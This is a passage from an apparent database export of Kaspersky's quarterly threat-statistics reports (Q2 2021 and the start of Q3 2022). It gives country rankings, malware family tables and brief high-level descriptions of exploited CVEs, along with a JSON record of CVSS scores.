At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). 
This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. 
It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an 
unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. 
Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. 
During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. 
The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. 
A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites deliberately; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can also be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local 
threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-30T12:08:22", "description": "\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. 
Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by 
financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leak to a personal initiative by one of their developers rather than to the group having been hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. As with other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy, [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over the SMB protocol and protected by a weak account password. 
The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. 
More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which took sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few 
Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. 
A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). 
These allow an attacker to elevate their privileges in the system through a series of manipulations during printer installation. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects the remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require the attacker to have already gained a foothold in the system before they can be exploited to run the attacker's malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. 
